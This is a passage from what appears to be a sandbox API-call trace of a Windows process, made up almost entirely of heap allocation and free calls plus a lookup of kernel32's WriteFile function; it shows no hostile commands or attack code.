lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0158.390] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded08 | out: hHeap=0x8a0000) returned 1 [0158.390] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0158.390] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0158.390] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0158.390] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec40 | out: hHeap=0x8a0000) returned 1 [0158.390] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0158.390] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0158.390] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0158.390] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def10 | out: hHeap=0x8a0000) returned 1 [0158.390] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0158.390] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0b78 | out: hHeap=0x8a0000) returned 1 [0158.390] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0158.390] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0158.390] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0158.390] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0158.390] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0158.391] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0158.391] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0158.391] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0158.391] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0158.391] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df1e0 | out: hHeap=0x8a0000) returned 1 [0158.391] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0158.391] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0158.391] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0158.391] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0158.391] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0158.391] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0158.391] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0158.392] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0158.392] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0158.392] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0158.392] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def38 | out: hHeap=0x8a0000) returned 1 [0158.392] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0158.392] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0158.392] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0158.392] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0158.392] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee48 | out: hHeap=0x8a0000) returned 1 [0158.392] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0158.392] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee48 [0158.392] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0158.392] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0158.392] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0158.392] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0158.392] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0158.392] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf310 [0158.392] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0158.392] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf310 | out: hHeap=0x8a0000) returned 1 [0158.392] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0158.392] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def38 [0158.392] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1a20 [0158.392] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0158.392] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0158.392] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ac0 [0158.392] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0158.393] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1ac0 [0158.393] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0158.393] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0158.393] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df1e0 [0158.393] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0158.393] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0158.393] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d420 [0158.393] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x24) returned 0x8dc1c8 [0158.393] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0158.393] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0158.393] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0158.393] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0158.393] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0158.393] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dc1c8 | out: hHeap=0x8a0000) returned 1 [0158.393] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0158.393] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0158.393] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df1e0 | out: hHeap=0x8a0000) returned 1 [0158.393] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0158.393] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1b60 [0158.393] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0158.393] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0158.393] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0158.393] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1b70 [0158.393] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0158.393] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd888 [0158.394] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df1e0 [0158.394] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0158.394] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0158.394] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0158.394] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def10 [0158.394] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0158.394] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0158.394] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0158.394] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec40 [0158.394] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0158.394] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0158.394] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0158.394] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded08 [0158.394] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0158.394] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8debc8 [0158.394] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0158.394] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1aa0 [0158.394] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0158.394] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8debf0 [0158.394] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b20 [0158.394] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0158.394] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec18 [0158.394] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0158.395] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0158.395] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0158.395] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deee8 [0158.395] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0158.395] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0158.395] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0158.395] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df168 [0158.395] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0158.395] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2618 [0158.395] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0158.395] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0158.395] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0158.395] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0158.395] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dece0 [0158.395] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0158.395] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2798 [0158.395] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0158.395] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0158.395] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0158.395] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2798 [0158.395] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0158.395] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0158.395] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0158.395] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2798 [0158.396] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0158.396] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0158.396] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0158.396] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2798 [0158.396] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0158.396] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0158.396] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0158.396] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2798 [0158.396] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0158.396] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0158.396] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2798 [0158.396] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0158.396] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0158.396] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0158.396] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2798 [0158.396] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0158.396] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0158.396] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2798 [0158.396] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0158.396] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0158.396] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0158.397] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dece0 | out: hHeap=0x8a0000) returned 1 [0158.397] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0158.397] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2798 [0158.397] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0158.397] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0158.397] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2798 [0158.397] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0158.397] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0158.397] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0158.397] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2798 [0158.397] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0158.397] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0158.397] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2798 [0158.397] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0158.397] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0158.397] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0158.397] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2798 [0158.397] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0158.397] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2798 [0158.398] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0158.398] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0158.398] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0158.398] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0158.398] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0158.398] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0158.398] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0158.398] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0158.398] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0158.398] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0158.398] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dece0 [0158.398] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0158.398] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0158.398] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0158.398] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0158.398] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0158.398] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0158.398] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0158.398] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0158.398] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0158.398] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0158.398] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0158.398] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0158.398] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0158.398] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0158.399] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0158.399] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0158.399] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0158.399] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0158.399] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0158.399] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0158.399] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0158.399] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2718 [0158.399] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0158.399] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0158.399] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0158.399] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0158.399] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0158.399] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2718 [0158.399] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0158.399] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0158.399] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0158.399] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0158.399] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0158.399] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0158.400] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0158.400] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0158.400] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0158.400] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0158.400] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0158.400] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0158.400] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0158.400] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0158.400] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0158.400] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0158.400] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0158.400] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0158.400] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0158.400] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0158.400] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WriteFile", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0158.400] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xa) returned 0x9bdab0 [0158.400] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WriteFile", cchWideChar=10, lpMultiByteStr=0x9bdab0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WriteFile", lpUsedDefaultChar=0x0) returned 10 [0158.400] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0158.400] GetProcAddress (hModule=0x75990000, lpProcName="WriteFile") returned 0x759a1282 [0158.401] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0158.401] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0158.401] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec90 [0158.401] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0158.401] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0158.401] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0158.401] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0158.401] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0158.401] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0158.401] HeapFree (in: hHeap=0x8a0000, 